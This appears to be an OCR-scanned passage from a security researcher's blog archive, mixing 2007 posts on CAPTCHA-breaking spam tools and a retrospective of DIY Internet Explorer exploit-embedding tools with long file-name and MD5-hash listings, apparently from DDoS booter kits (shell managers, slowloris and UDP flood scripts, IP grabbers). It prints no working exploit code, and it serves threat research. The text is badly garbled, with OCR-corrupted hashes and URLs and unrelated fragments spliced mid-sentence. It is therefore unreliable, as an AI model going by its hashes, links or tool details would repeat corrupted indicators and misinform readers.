do the trick; certainly no more than $50. But the cost isn’t the point. What’s more alarming 
is that thousands upon thousands of site owners are depending upon flawed technology to 
protect their sites from spam even though they know, or at least should know, that it’s only a 
matter of time until some spam robot shows up and starts hammering away at those worthless 
little images." 


The irony regarding CAPTCHAs are how less popular sites compared to the Web 2.0 darlings 
often have a more sophisticted CAPTCHA compared to the most widely used web sites. 


Related links: 


[3]Craziest Captchas on the Web 
[4]Cryptographp 


[5]OCR Research Team; [6]List of Weakness 
[7]PWNtcha - captcha decoder 
[8]XRumer 


Related posts: 

[9]But of Course It’s a Pleasant Transaction 
[10]Vladuz’s EBay CAPTCHA Populator 

[11]Attack of the SEO Bots on the .EDU Domain 
[12]Spam Comments Attack on Techcrunch Continuing 


[13]The Blogosphere and Splogs 


1. http://tech.blorge.com/Structure : 420/2007/07/08/spammers-overcome-hotmail-and-yahoo-captcha-systems/ 
2. http: //bbspam. com/2007/08/15/captcha-the-broken-token/ 
3. http://www.tonsai.de/blog-english/2007/craziest-captchas-on-the-web/ 


1035 


shells.php 
6ec12536a63f21bcc3ebe124e0bbfle9 
users.php 
cff863c2d834aecOff7bc11d092f7950 
.DS Store 
42671d2acaf97bbcccb8e4ea4c9cb626 


blue.css e2de4a882b15bec980fdbee19al1478aa 


green.css 
ec4bb1bc1cc21506ca74a191ea700fb1 
index.php 

red.css 
6384b73c6d779e97972aea35269b3c57 
«htaccess 
43791d0c7cb49d15c45d65c87d08elef 
.DS Store 
9c2986c1d0e324d527aa790d2902a872 
index.php 

logo.png 
c52fc4f4e9d8e03d66431c5dedecd3e9 
top.jpg 
4a09cb9a95d530ee288ce26537975a9c 
.DS Store 
ae6f4a7305320426da6d734e225e6d83 
error log 
879698faae025fc7c220c988be28a4d5 
index.inc.php 
ada6546fc7b4f4055f8f1097fa374017 
index.php 
da5c3962787ea962ffb943b88f2bbfcé 
style.css 
d81e8f4227a7e9bdd09352dd41b4a33c 
.DS Store 
fd9b9d0142682eaafc8af6alb9ec18fa 
footer.php 
€658e82f7d511384cab7554b150378cb 


10323 


header.php 
e3847f24edefa8df46782e088e915a62 
index.php 

nav.php 
30eb5def0bb309990db421557955faad 
.DS Store 
a9338295b90517624b28925be0666c75 
index.php 

nav.php 
5ccd350a000638d4f081512f3a86d3e2 
attacks.php 
e60aa49f33ecfed5d510ac82b931f815 
converter.php 
4f44b92109273f6098f851a13321e72d 
core.php 26a86d27caf41f6a5f96ef5829387e3c 
db.php 
1cb59736794b37c247f923afeaa01b20 
edit _profile.php 
2beb09577044d16434c0b067a563fa96 
enemies.php 
adb4563c2aeaf63fdb0c3a2578c578a4 
error log 
f41847a31b4332daf5cf64448ddbb7f5 
friends.php 
851b8al3a69bfe8ce098261f72ef591f 
funny.php 
ef0b403eb969650e1d4139b413fc6f00 
hub.php 
397a6e00125d690a98cdcbb48272cb87 
index.php 
096cddb86cdlc5aaeb2beb6le8fccellc 
install.done 

install.php 
5fc185791bbc861d73ae8dc3d6d4cb17 
ip logger.php 

10324 


463aa71c7el6acf8cd1494f9953bf7 bf 
messages.php 
b5aa33b92747d16a3eaf15f7486b98f5 
port scanner.php 
440099d6fac410b3cae08c25d56fbd50 
profile.php 
d46f4ba7ee5962e18bdf6e3209212d68 
set state.php 
9a47dec71823700904b2e6bedc324cb4 
statistics.php 
7bef84706788bfdb7d00bb45 7f31cd4f 
terms.php 
a2197621535599c18cbba6618dd50913 
.DS Store 
d16ce225a0ae71ce367c157c329bel1d5 
add.php 
b618eec64658688628al1c9f2e4ea6e80 
blacklist.php 
eclb1d5f89fb582cf851d9fb542755bd 
error_log 
cal8853d832f8a7bd050a81de41a895e 
index.php 
e7d3f84da6967b3c6ca2198bc8c8911a 
logs.php 3f7f7e8e03710b5af90832a0943ba51f 
news.php 4f5ea48473574f46eb3ef46b8e72a869 
settings.php 
6a56dbe9cbb819bddc7c9abacc5aa20e 
shells.php 
6ec12536a63f21bcc3ebe124e0bbfle9 
users.php 
cff863c2d834aecOff7bc11d092f7950 
.DS Store 
42671d2acaf97bbcccb8e4ea4c9cb626 
blue.css e2de4a882b15bec980fdbeel19a1l478aa 


green.css 


10325 


ec4bb1bc1cc21506ca74a191ea700fb1 
index.php 


red.css 
6384b73c6d779e97972aea35269b3c57 
«htaccess 
43791d0c7cb49d15c45d65c87d08elef 
.DS Store 
9c2986c1d0e324d527aa790d2902a872 
index.php 

logo.png 
444006f575ad905f0fe8981386f0ffid 
top.jpg 
67fb8974c3e3b2f2e2cfc823f128fe65 
.DS Store 
ae6f4a7305320426da6d734e225e6d83 
error log 
879698faae025fc7c220c988be28a4d5 
index.inc.php 
ada6546fc7b4f4055f8f1097fa374017 
index.php 
da5c3962787ea962ffb943b88f2bbfcé 
style.css 
d81e8f4227a7e9bdd09352dd41b4a33c 
.DS Store 
fd9b9d0142682eaafc8af6alb9ec18fa 
footer.php 
€658e82f7d511384cab7554b150378cb 
header.php 


e3847f24edefa8df46782e088e915a62 
index.php 

nav.php 
30eb5def0bb309990db421557955faad 
.DS Store 
a9338295b90517624b28925be0666c75 
index.php 

10326 


nav.php 
5ccd350a000638d4f081512f3a86d3e2 
about 
654eebf060ef940b41c29eeea69d1845 
Byteflood 
37494471c57d29f42dbbc5e4d4ce2ac1 


changepw 36ae297965b0572a3df0963f38818991 


dos 
8ad3785292dba6e71499ff90cc35ed70 
dos2 
874de8154ca78cd08aa57adc35dae753 
dos3 
5845d4c7ea277d97fd6éfcaddeed8778d 
dos5 
771f2f345ec3e3609f7b47a88dca84a0 
menu 
027b044c2885826e9d532587abee0c2d 
pdu.py 
e034fa51b3271932e6f249fb54773e0c 
target 
38fed7d3872c9e890055c23f56c3aba3 
udp.py 
e034fa51b3271932e6f249fb54773e0c 


Makefile 8a82967ddb52fb787b6a6eb7f84b4b51 


proxymini.c 
4laea6dec84facc47c31599915b9beac 


winerr.h 23d8dc3ab8272e29c4eeecfd9cc52071 


admin.php 
ab66533f0fa4afd573f50ce305fde191 
cf.php 
€265a702229f28dc2521c9b78e368808 
config.php 
€0151260af6b7ac179d82d0164344227 
hub.php 
7243bc3d6b0a15875dc2f24fbf7c32d4 


10327 


index.php 
03eba987b843b76c96e7db6d8c75f9e3 
login.php 
7b0c1le0d75faffb71991e64f09a5a5f1 
logout.php 
0f505cbfa67974b84f6717415373cea0 
paypal.php 
85bb193f229da473ca768cec838ed071 
ajax-index.html 
78cf066b2c94b1823d9af57f3c28a2ca 
etab-ajax.html 
3fc7eelfo77474efbc3408cc0e2df648 
tabs-content-1.html 
df2e9b50be18fa91d3689c63432fe43d 
tabs-content-2.html 
53042161e2b39bba0b84f4b26782bcbf 
tabs-content-broken.html 
61535cf5b3e57de6e2ac69bf0cc04b60 
widget-ajax1.html 
8ba6bc3457597f98213002d88743cfc3 
widget-ajax2.html 
0119d991ec66b4de96bb6d3629dcf05b 
widget-ajax3.html 
1c93ffdea72156fcac71b58a287b0c93 
audio.min.js 
0c3f448250e39fe31a5ed694d38db7ea 
player-graphics. gif 
9a30a4e60ee49fba2db43a58363abce7 
framework.css 
b4cb507aa3ff87976393f2015a4b6097 
login.css 
931bebfcad4575566f6bf8e22b368c23 
style.css 
46404cd424e964c9a36224d31f9c2b93 
entypo-webfont.svg 

10328 


47bcd623flefcldb1bf23bcdb40d7a31 
stylesheet.css 
0583fc979ee47e9469f948belbedd5d9 
darkblue.css 
26fdb72c3ebf00fal0e4c68a2c5db202 
jquery.ui.accordion.css 
563219b202edfea4a42fc6f3f5a8cfb6 
jquery.ui.autocomplete.css 
3d0e786d52a91be7b6b8e4d4add3e785 
jquery.ui.base.css 
alc856f22de00bb42a6431a6ab1505be 
jquery.ui.button.css 
24e532ac8541b486060bbba0d0f7ac2c 
jquery.ui.core.css 
be8915b7f444ef200279e34c87a574a6 
jquery.ui.datepicker.css 
80b5e8613d1c50825e55d65af9858753 
jquery.ui.dialog.css 
89166ec28b0233ad208e945460cb39aa 
jquery.ui.progressbar.css 
6139ebabb67274a0ddd38dc12d123915 
jquery.ui.resizable.css 
e5a25cde774affd9009c95919e2b5188 
jquery.ui.selectable.css 
23346c3691d0bebb6000e6291d591a0f 
jquery.ui.slider.css 
4c79d4ec725cb87549745672c464cacd 
jquery.ui.tabs.css 
790a4929ae0193e9886d6aaed7ffe7de 
jquery.ui.theme.css 
40b2505f5c63370b6b312961ffcb6bfd 
boxsizing.html 
591ca1262a113ec0af3290940f1304aa 
apple-touch-icon.html 
bcc7fab191f477628269464b6889f04c 


10329 


avatar.jpg 
d37e645757bcb4f28ed4c89513ff6c87 
datepicker.png 
c6febd01f22a7de0bb3a489104dcf682 
Descr.WD3 
d2fe86b0df7a7ceba666c9232e650a9d 
elrte-toolbar.png 
fa07ff01f10fd3441bbd3f0df8360396 
growl-1.jpg 
0fe5682f41bb45a9026d6ce484678287 
growl-2.jpg 
6e4a896254973909eb0848d5bff4e678 
jquery-ui-logo.png 
Of0e4bc37a9b0aaa98f95d03111c47f0 
loading.gif 
821333aaaf8bad9c2b327ccb2a924475 
pixel. gif 
6d22e4f2d2057c6e8d6fab098e76e80f 
swf.html Of63df42cd3b3bc155b3a3ee78f96467 
Thumbs.db 
360ded5c50272a3dea07ab9b487b93a6 
arrows-active.png 
5463d585532aa23a6a54776a020c7f04 
arrows-normal.png 
e€479c6b5847e562elcf6fl2bef3cb850 
Descr.WD3 
bcff0d243e0cc06e46057ddeb8376e25 
dialogs.png 
€2304c50865f6e9f6F7d4b743f067071 
icons-big.png 
ebbfff72ab0f3af7185a26484elccb42 
icons-small.png 
1cc7e5b5209b52315229e06a848d679b 
logo.png cb9f576d7f18a12d7491792263d81194 
progress.gif 

10330 


a937laaf90b95f71ff98eb9c861ad28c 
quicklook-bg.png 
59c269d5821ab7c018d8e9248c6ab030 
quicklook-icons.png 
f141d9d9669cfb9dc492edb91e99bf9Ic 
resize.png 
7534f49b3685850784498a01b7f6bcd6 
spinner-mini.gif 

76977607 6d5fceef4993b55c9383dedd 
toolbar.png 
fOd5e6de3a2d9aee9369ca04b0cbc59e 
Descr.WD3 
8a4e08714d62dfee3ed2c65e2b3c8023 
favicon.ico 
€881b7f7945215f23231499697c61b57 
cut.png 
63f7279113cee951e06603433cb9f3ad 
Descr.WD3 
bd2e31lab25ed2fef325dc175773bdc14 


door.png 632e5492ec3dfa720804f0 laeObd4d71 


page white copy.png 
38de59d96ecaal47d8b5f440b4c4b0e6 
page white delete.png 
baab23c41cdc34dcd6b068b23f963762 
page white edit.png 
97176626eef35c7beb4f05a850325042 
page white paste.png 
37f35a84b3c1e324341715a9cabfb8c8 
comment-16.png 
4330fabe339023b889abf92F79b4bf0d 
delete-16.png 
caa4b91c1447b3e782874561e8fd4fof 
Descr.WD3 
0786da77d33363a6dd8c5ab968dcfa7e 
info-16.png 
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3albaa5fdd08e9a7510c327528173809 
plus-16.png 
6d35da3d8524c1fc519e1e0b9743eeb7 
warning-16.png 
f059b78b280b989e940255bbbe324ba2 
de.png 
ddabae687ecae5edaaeb808d440543e6 
Descr.WD3 
d4a79686a8c1081721fd398d2021d9e9 
es.png 
d6693ce2a6346b2da89ceda335554e0a 
gb.png 
0894999b108830afc0733ee7b6e08310 
arrow-down-10.png 
465ba51la3fb2db64e1d7flbc02e202a3 
arrow-left-10.png 
47139c45f81b8ba296856c0b755c82f4 
arrow-right-10.png 
57131c206b399fe143117762d14a6d11 
delete-10.png 
31fc230ebc59fd2ccf045004778a0cal 
Descr.WD3 
1d3b18c026c87dff941143eb663840b6 
home-10.png 
04239eecbf9b5940fb718f963047c518 
min-10.png 
2093cacf7b4e7c9ecd4196bce9974c37 
plus-10.png 
ba22c4a8fa9f189d852a878753443ca3 
arrow-right-16.png 
d03046567ea46bbaca82e8c8042077f2 
arrow-up2-16.png 
f9441435c78496679aef11f0e11599bb 
Descr.WD3 
f3ddc7c0e3102b40c1270ea28d4d20b4 
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http://www. cryptographp.com/ 
ttp://ocr-research.org.ua/ 


ttp://ocr-research.org.ua/list .htm 
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|p: //aan,zoy.ong/puntchad 

_http://pandelabs pandasecurity.con/Ritmer aap 

_ het: //Adanchev blogspot. con/2006/08/but~of~ course-ite-pleasant~ transaction. heal 
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13, 


3.9.2 DIY Exploits Embedding Tools - a Retrospective (2007-09-04 12:27) 


arevyoufearless.com — X 


IE Exploiter 


IE Exploiter 
By o 36 ‘@linuxmail,org) 


Before we start please note that not all versions off Internet Explorer are vunverable to this 


Server Browse 
Finished Encoding 


Encode Server Create Document 


http: } /areyoufearless.co! 


Great analysis by the [1]Spywareguide folks - Chris Boyd and Peter Jayaraj in this assessment 
- especially my deja vu moment with the King’s IE Exploiter tool which | intented to cover in an 
upcoming post, in a combination with a brief retrospective of exploit and malware embedding 
tools that were empowering entire generations of script kiddies during the last couple of years. 
These tools are a great example of what the DIY trend used to look like before malicious 
economies of scale were embraced in the form of [2]today’s modular and efficiency-centered 
malware kits we’re aware of. 


- The IE Exploiter v1.0/2.0 


The tool is first know to have emerged back in 2002, with its latest version released in 2004. 
It was first branded 
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graph-16.png 
5c61eaa325663594dd5fd64af2692ce6 
image-16.png 
c817009ea4c13b0dd0ba63a2b131b64f 
more-16.png 
357929fcf3bb49d008edeba8c5991707 
postcard-16.png 
€1c67c9297b06a0af222b5c6e660c882 
stats-16.png 
d1le1fa36532a25e280f035e51f957ace 
vcard-16.png 
1fe7c14d5a8d99bbf213387f205a63c6 
Descr.WD3 
ae4b8e24d42d468eb021318c8d05b401 
facebook.png 
a88781cOdeeb498cc6bc122cc4ea39fb 
google.png 
€22893693e4b506bd8c7364d6b5ff0d1 
guest.png 
€5d9c82b94f83229145ebf78773c77b5 
openid.png 
2aee61403d1e856777a5949b580a3d0b 
social-rss.png 
b37f501673e49a96d07d35d9f7af9c11 
twitter.png 
e927efeb4f47ac1655c57ac52c28840b 
yahoo.png 
Oec0d19fd3fdcb9d0780ad3f7145fd41 
Descr.WD3 
93602babf7ad4006084bac7d15f77f45 
facebook.png 
b8a1b1050748079c1452d3d20566b761 
rss.png 
bc235b79a2a37b25e624432f56bec3cd 
twitter.png 
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c9c4390e8403a39165daa7fl7ddcf96e 
Descr.WD3 
ea2926f6c230a56c4f9f26422a8bfC97 
facebook _signin.png 
6868e11a18a5b2d3dc40694f80de6c5b 
google _signin.png 
8764490ebc62ccae2cd0d36f3fd8a8fb 
twitter signin.png 
b2c879b0b7967378994959e7221042a6 
yahoo _signin.png 
7a3aa8da973c34534d8b21b0fb1e2a04 
12.gif 
5613eb68a1da933ac478198b57fd37af 
16.gif 
45el1bfbbc1a7f653a4eab8b241a31465 
20.gif 
67c6b994c2cf1135ddfb6d3a017e6206 
24.gif 
a8a662baflecb75bb539a5e9508b194e 
32.gif 
Obe9ac6c6flba4bb214acbc4dc98b400 
Descr.WD3 
505eed102026e6df043e559bbdee4c0c 
12.gif 
adfbo4ca8b51377f9ac44543cd20a474a 
16.gif 
90c93102a88c2ab94bff1575b7a6e86e 
20.gif 
93bd1386834c72a27264507552a96687 
24.gif 
f6d99cadbb72aed45bflaeccfacb13f2 
32.gif 
65daaflf2a2988cf820139185279f1a0 
Descr.WD3 
b57135847efb89f62807174ebf9a584d 
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12.gif 
ef2d182507d91e000a79aeecf1l6be841 
16.gif 
b728f96b7371lafeclc8ela8a9cc25a4f 
20.gif 
babbbd16f6c6f76694a5f9b7d8b19b09 
24.gif 
37cfb636dc83f8108b14a3ef37bcb390 
32.gif 
1356e510e78538a7fc424206be2a5064 
Descr.WD3 
22dbc49ec19b02c0e7f5b394725cO0bff 
12.gif 
ab8a382e082e6566c2adef4612ed47al 
16.gif 
c2fa85a9bb0e72edale2216d01a77263 
20.gif 
1303767981ab2b92251c9e7d1d1f18b0 
24.gif 
c5a26aab7340d388708fa484db8b4783 
32.gif 
€1111410e8cf4b9715d2b52b28b3779b 
Descr.WD3 
52a17ac379b6a55ee1ec0665501cac35 
12.gif 
f91d33d45d5c5ce8a844a85bab88fb10 
16.gif 
€9b19255738c8d3382c0cf28ebdaecfc 
20.gif 
€e4705520733242b8ad4d2e51d7db3f8 
24.gif 
d57d93cbb8b778900d8ea67596f74a73 
32.gif 
c7095f596714fb426ae07a03270dfaa5 
Descr.WD3 
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5e12a4f0f27f3f19e23c6880d0a3cal0 


12.gif 
36efb8ac76eb52b0504d7al16c844b89f 
16.gif 
47ab26f5e622ecec3458581430c82297 
20.gif 
7d6b61d52967cc9d35be17dd4725fbc9 
24.gif 
5268f9ae439002ee4704deda4b54e174 
32.gif 
2fef77f702957cba854e22d2a72a2ef7 
Descr.WD3 
d3d0b04261324c40bc2c2a8afcf90c53 
20.gif 
13bcfbab4694dae165e676bd6b764dd5 
26.gif 
€68071a26268506dc8f364b36bee9e9d 
36.gif 
3f5fd17fcd193f967ddc59a21cf871de 
46.gif 
5ad4a9c6da61o6fb5ebfc83e8ea1f2230 
56.gif 
2fb2f30ceee418efedf103a0a6d781b9 
Descr.WD3 
20ad7e62f4b6139fb040a2694f82cb05 
12.gif 
c40bb91c2bc067247d543dd3793266b8 
16.gif 
66f527698a34acddf5884e76d2fc0b83 
20.gif 
Od0a4da86564fa40cacce56ec92cfcfl 
24.gif 
2a8d8c5a19c8dc364056e054b76e6a76 
32.gif 


f5c30a225bddd18a0e2cc79c3fce02a8 
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Descr.WD3 
548b939b2f83148c331df54e120eb5df 
12.gif 
52ceecd5b408dc95bd3f5020b470e542 
16.gif 
c366bfal8e6735f03be6347cebbadf37 
20.gif 
720b17af1cb4378c5b5b1160a8ec58a7 
24.gif 
4e1199997a8329blafdblde733bff6é36 
32.gif 
1b54a982369581e5791c9ccObb4ae76a 
Descr.WD3 
a45be7cf0a237d62a9f5075el1f78cca5 
40. gif 
al4e20d7c6b6a7432d2f6e296a55d454 
50.gif 
dfc1d40c23b9b070445768ae3ed7557a 
60.gif 
74bb32acfb559b7b52e94ccde4eb93a0 
70. gif 
8a2629a62f5d4d22516b83d658340ald 
80.gif 
b13341a35a29915ebda20a90ead2defc 
Descr.WD3 
b973a94b5f5f4bd5a80dfebbd6ba28b2 
40. gif 
al4e20d7c6b6a7432d2f6e296a55d454 
50.gif 
dfc1d40c23b9b070445768ae3ed7557a 
60.gif 
74bb32acfb559b7b52e94ccde4eb93a0 
70. gif 
8a2629a62f5d4d22516b83d658340ald 
80.gif 
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b13341a35a29915ebda20a90ead2defc 


Descr.WD3 
0b63c10cd8562d947bdc21081e0ad8c9 
12.gif 
a6b21342d7f742a7e3f67fd1c81c7792 
16.gif 
1c682e9bf00f711552bdc973572ffo5e 
20.gif 
40055b29128fa3b549a08ca211bb8a91 
24.gif 
a52c30fc6c8574437bb27547d6aa39da 
32.gif 
398b0612b7798dc72487b75bc0a154b4 
Descr.WD3 


59116e928861d6f39512b929c3b8791a 
apple-touch-icon-114x114.png 
5fe79af0a7c19fd6e516444bf7f2d4ee 
apple-touch-icon-72x72.png 
17671821f1b4c2c5ab65f55e81a4f873 
apple-touch-icon.png 
86d6ee34042aff39b74d2f6d38c96923 
Descr.WD3 
ba53af40f2cad5867a9526691199ed0b 
splash-1024x748.png 
6f115425fd1bda99f4e91927fb49e9d0 
splash-1536x2008-retina.png 
Oc3a8bab5bd6de7fal5e7b460be89a21 
splash-2048x1496-retina.png 
d50dea8a701137b314492b5c0475ef9a 
splash-320x460.png 
896bcc9358c601cf9a92720701564917 
splash-640x920-retina.png 
3351c14de11ff8e4e7c3d6f270407556 
splash-768x1004.png 
0dc7996ee28d54c7c64d38dd54a83e7a 
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bc-arrow.png 
e0c1d215faa844a6541c574da8d157e7 
Descr.WD3 
e4290alfa75c92cee5938bde61b2cbef 
e-checkbox.png 
edefl6e4c6f02b0e9cf78307fc51d40f 
e-oskeyboard.png 
97d0869c18fef01lef9f134e64b187bd4 
e-radio.png 
9958da4c45cb484b3721e38f46382ef9 
grippie.png 
ad5539475df69484c0884280c37b2152 
handle.png 
085f51b41f62055b13bd9791abaa2e8e 
plix-10.png 
8c9bc19ca534b23a3ddc75167721ca85 
plix-16.png 
406a751cda40b11f4989c1a45d34c613 
plix-32.png 
5442c06baleb022e45a42e34c325537¢c 
scrollbarhandle.png 
0779ee749be756f052829fcd6celbad0O 
search.png 
7bc7d9d280fdf4b4ee0d4fd2cba66971 
subline-end.png 
3b53fb176c7ad7e8a42b90c06ce60b9c 
subline.png 
cla501dadb989f25038bc2723dc566a4 
ui-slider-handle-horizontal.png 
2119bb3cac5fce62f424f7e39ac825b3 
ui-slider-handle-vertical.png 
b3b3747948c50d74d07799b46dcdce98 
ajax-loader.gif 
30d8e72bfdae694b1938658e1b087df0 
Descr.WD3 
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5c45ca050bc64736a9fca479634fb842 
file.png 7fd95dd77d38cf4472b0987191cef2cb 
folder-closed.png 
c5cf437e3f35a8f8abd11039290065ba 
folder.png 
9e633451e5dcbc8599dd2e2560cfabe7 
treeview-black-line. gif 
Ocdd968bdb2f2852ec71e0264b3292cc 
treeview-black.gif 
a3ffo8abd978b0464f7b5b508fcfdefO 
treeview-default-line. gif 
5e3c0e0c48f48c23c45aef7b72c739c0 
treeview-default.gif 
46878a9b3ede269c4e234550c9c89cd0 
treeview-famfamfam-line.gif 
18b3e43abad26bdac6f4cea944777b62 
treeview-famfamfam.gif 
dc335e786863262f594737e26198009c 
treeview-gray-line.gif 
9c2613b4de53f939bc770983976f66cd 
treeview-gray.gif 
02b42894653cfd82e52aac669ad078ed 
treeview-red-line.gif 
feda280e7bffb057ca4c87491aab6943 
treeview-red.gif 
c94a07253c14c98feb69dffafb59228a5 
Descr.WD3 
cf37ef569341f2fdiccOfe02177109c5 
img1-thumb.jpg 
5c333778e655bb3e89908122900al1c3a 
imgl.jpg 7808ed480f1b30d403d023f7a74751d0 
img10-thumb.jpg 
b889eb4f6a526ac8f47e2af45ec72982 
img10.jpg 
6393e5f2f8ec9a191546694781a3b69a 
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img11-thumb.jpg 
2479ac09b9b8860d772bb9ae1f983d3e 
img11.jpg 
d0a24418866d723deedb5d4456e53f26 
img12-thumb.jpg 
fbo310ab450e3c7eaf2dd8414ea778546 
img12.jpg 
05a009ad11780004178bfa5cefe5f7f3 
img13-thumb.jpg 
d16cfa7204963c562ac1dd0329030e13 
img13.jpg 
d6b0343bfcee9f4f938b05606b04d746 
img14-thumb.jpg 
76dd948e2c4ff2ef4fc3bc64c5e99952 
img14.jpg 
39aa54636de3087b23accfae4960dc6d 
img15-thumb.jpg 
f395388530357b024a71fc173bbal14c5 
img15.jpg 
5b9bef47cc61d97224110f9d8e90edeb 
img2-thumb.jpg 
53180d6ca802dafcfd536d36d6badd6f 
img2.jpg 15bc4a13f36a5755b02e05411fb87660 
img3-thumb.jpg 
8fd4ba347ed2f3ba0086cOdcdcOb9bb5 
img3.jpg cb42b83b1ab94d43d67dc7d6e91a55a7 
img4-thumb.jpg 
136efc293fa71bcc500022db22cd3063 
img4.jpg 4b3031d5ecb6ff3ac39dbc0c8986c25c 
img5-thumb.jpg 
f0bc65cc9a617e0760bd2ff87ca36bc9 

img5.jpg 2c10ec10f28d539d9e421249ec5f5f41 
img6-thumb.jpg 
cf9cdee3cdcf9979ee35ac9bcafe2b26 


img6.jpg 04e3c5fc821737e5e8bd6a0c0a94d926 
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img/7-thumb.jpg 
b53301labfl11cc2aef478cf6d8cb4475 
img/7.jog fd8bc5abbc14f4f4f2ad5b49c82bab69 
img8-thumb.jpg 
a66783a29898655c24d967f28cbfd4cc 
img8.jpog 53b31966d7cafa6600c9722c48ae4e25 
img9-thumb.jpg 
2c00784dbd55bc588680ce31342edaea 
img9.jog 7dac62d749231ab5cfbac2730d602752 
autogrow-textarea.js 
5dee98026032bc2211d7a9aab64f97b18 
custom _new.js 
2817f0b7e8591c6dc2cbc83659981eld 
elfinder.min.js 
a8e60b1b48a307df7e0bebff19b9291e 
elrte.min.js 
db5504e3fda05ebc6e4670bbddcel5e5 
excanvas.min.js 
3682670784157eca627a91ae04f925b8 
e _styleswitcher.1.0.min.js 
ad3fcf68508d930516877c588b1fcb8a 
flot-custom.js 
3flaf58cf7940be30cc32813f86fa2c0 
fullcalendar.min.js 
e6e9fdf1798e43132881eed7b22c1a24 
gmap3-custom.js 
e4c7c73cb9b7333174841687028de0cf 
gmap3.min.js 
b899c7c26c5c7f483b8aed20ce6a29e8 
jquery-1.7.2.min.js 
acc0adc6c188845a409bf158d2de4451 
jquery-ui-1.8.22.min.js 
96a9acd4b04ecb9732dbd0082eefc37e 
jquery.colorbox-min.js 
343f4ac783b347fd60920ad64eca786c 
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EXE File: 


_|F:\Files\Macromedia Universal KeyGen 1.4.EXE [sal 


Loaded 31700 of 31744 bytes... 
Hit ESC to cancel 


as the "Fearless IE Exploiter" and then returned back to it’s original name. Description of 
the v1.0: "Fearless IE Exploiter allows you to embed executable files into HTML documents, 
that when viewed in an unpatched version of Internet Explorer 5.* will automatically download 
and execute the .exe". And the description of v2.0 : "/E Exploiter v2 is a very simple tool 
that creates a HTML file with an embedded executable file. Once the HTML file is viewed the 
executable file will overwrite notepad.exe on the target system and then execute it using the 
view-source: prefix." 


Result: 22/32 (68.75 %) File size: 149359 bytes 
MD5: 315cd35aa5a0334697832e83fac7b0dc 


SHAI1: 71a7929f7781d969a63e532cd8cd877940a2cal2 


Re King18 IE Exploiter Puplic Edition set 
KIAGI9 TE EXPLOITER 
OHeC3k rKtinn C3MW 36N Ska 6xN 
WD rr 
Pe eae [http //server.com/server.exe 
Fark aH 
Example : "http: // /server.exe 


SOV CH SES6AKE ——————————— SskVisHbl WNGsK6 SallHay— 


i blH6 Jor fox fiblad ball SKH SaxsHM 


OCxM | POC3axn | KAxHa 36¢3HA | 


- King’s IE Exploiter 


King’s IE Exploiter is an Arabic DIY exploit embedding tool released around 2004. Despite that 
the malware embedded sites generated on-the-fly come totally unobfuscated, we will yet wait 
and see the eventual release of such feature. 
Result: 6/32 (18.75 %) 
File size: 253440 bytes MD5: e6052d3abf95429fd761feef0a695470 
SHA1: 9f91e21bf9e8898a09c36b31bb1f5afff3cb8f35 
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jquery.contextMenu.js 
15267e05fa0852c325394a382021c19b 
jquery.dataTables.min.js 
6147ccee7aef9dcO0c6eb10d8d7b311f9 
jquery.flot.min.js 
244d23bee2a775923c6871f4b0c31b84 
jquery.maskedinput-1.3.min.js 
8ac5015164e111d6aec48b1c72f18a02 
jquery.mousewheel.min.js 
25db04e9daee1c00f6ca337537c32c01 
jquery.ui.spinner.js 
0bc97a11d72883961bbd8012fc4b1c9d 
jquery.ui.touch-punch.min.js 
eb876f2754b995 7f35d839b4ee75776e 
json2.js d1641314bflb7e5c31a1658fc41ab279 
login.js 87e238d36c73616ed8e846365fd7d00a 
main.js 
dba9f45622bfec18e929b7c4e84b9731 
mobiledevices.js 
7d927aa9a036ac5e316d4730148ac6b4 
modernizr.min.js 
d4b8834df800f1f8b0646b51d22a060a 
selectToUISlider.jQuery.js 
062541lacb60f9de842802e64efab69d7c 
textarearesizer.min.js 
b2f4ee196579ed74139ee10ac76ad780 
tipsy.js f6418c3e676f7ff1848d5d01761e8ac7 
treeview.js 
b8bebcbdde81a3a8509cc39c26f74e7b 
colorbox.css 
3d6b21c8891f83e068e72863cc16ec83 
wysihtml5-0.3.0.js 
e38e8fa7ac26f3c6fd276428842c055e 
advanced.js 
ce36382e91e7d3e44532423652aa78de 
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DevComponents.DotNetBar2.dll 
e5277bc7d04a32074f9e9b645cd80882 
DevComponents.DotNetBar2.xml 
54c686ca426dd7d045f99a55e7d726c6 
Jays Booter.exe 
778cb37b45bed32662c67748edf508ea 
Jays Booter.pdb 
8197a14c1e519f61f0a7da254e499350 
Jays Booter.xml 
3c7d81de601e8606169c9434681e96f8 
banner.psd 
972d065de0d335b3e93610a391ff5d4d 
jeejeepo _booter.sql 
f60cbc88329c78bf16ab316b6aef468b 
logo.psd b0573ad8df16fbe5910ffd13ccb7eb47 
readme.txt 
2b73a5cc203fcOfa2a7c411cce713f95 
«htaccess 

accept.php 
1d9b47e6fefe5eaf24bb078d6cefc3cd 
activate.php 
29e8a708c05a3b3a94162bbde986f15c 
addshell.php 
a3a612697f000ce5cc5bed3611d50105 
admin.php 
a0f6690d83d2e1616175aela75eaf8e2 
checkuser.php 
2bfcdf002b83830fa65ee308d51a2695 
dbc.php 
4c29e5a3d10cbc494fb89f9c1bdc3009 
do.php 
1b2000290158151cda00caac858e4a6b 
donate.php 
ede81a2b9e30b4aa8d7cb1306ba0d250 
enemies.php 
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b5e9af17f49c3bc7046aacOaaba8ba9e 
footer.php 
75da10c3ab35d21c006a19946f0ef190 
footer1.php 
501425bc118925eeced3815187a3c56f 
friends.php 
50b32cOla3db48e4a86f32fe4cl1fe70d 
get.php 
130f364fb9fe0ba53557c21738aff389 
header.php 
1305eccf62fb1f8348c442e0ffafc790 
hub.php 
7¢32cbd96715faff706620c5de80bd84 
index.php 
c4eb38cf397814db6613e910b0c4ee61 
ipgrabber.php 
3bf5ffo245ac9c91f33ce54d51174f8d 
ips2.php d18d0cec2d3c9a00fleb031d085fc4c3 
log.txt 
dc181bda19732da80b5fd270494d139a 
login.php 
65c9531e80748f395238cbb4f0b491 3f 
logout.php 
£7f43702441b28154fb45b1le2cddf99c 
logs.php 67be001933be0feac077dca30336247e 
manageshells.php 
766833b5a993e4d3dd45fc418b787bfe 
mysettings.php 
0f1e24643b479fda4163f6d6c39ae06d 
pinger.php 
baa040c996d2f0ef25624637343875f2 
post.php 4c9bd2f1214eda3994d42101fede5944 
register.php 
1dbc8648ea79690ab607334106aafa22 


shellcounter.php 
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807b62d5348f8c79c326058e278c75d0 
shells.php 
f80c9db6af46a790325a9430fd0351d0 
slowloris.php 
f9f995315941f1025512bf8450a7d147 
staff.php 
2575431321c60872d7bce22896050a35 
style.css 
803a979dd494cec76e3571496f71275e 
stylel.css 
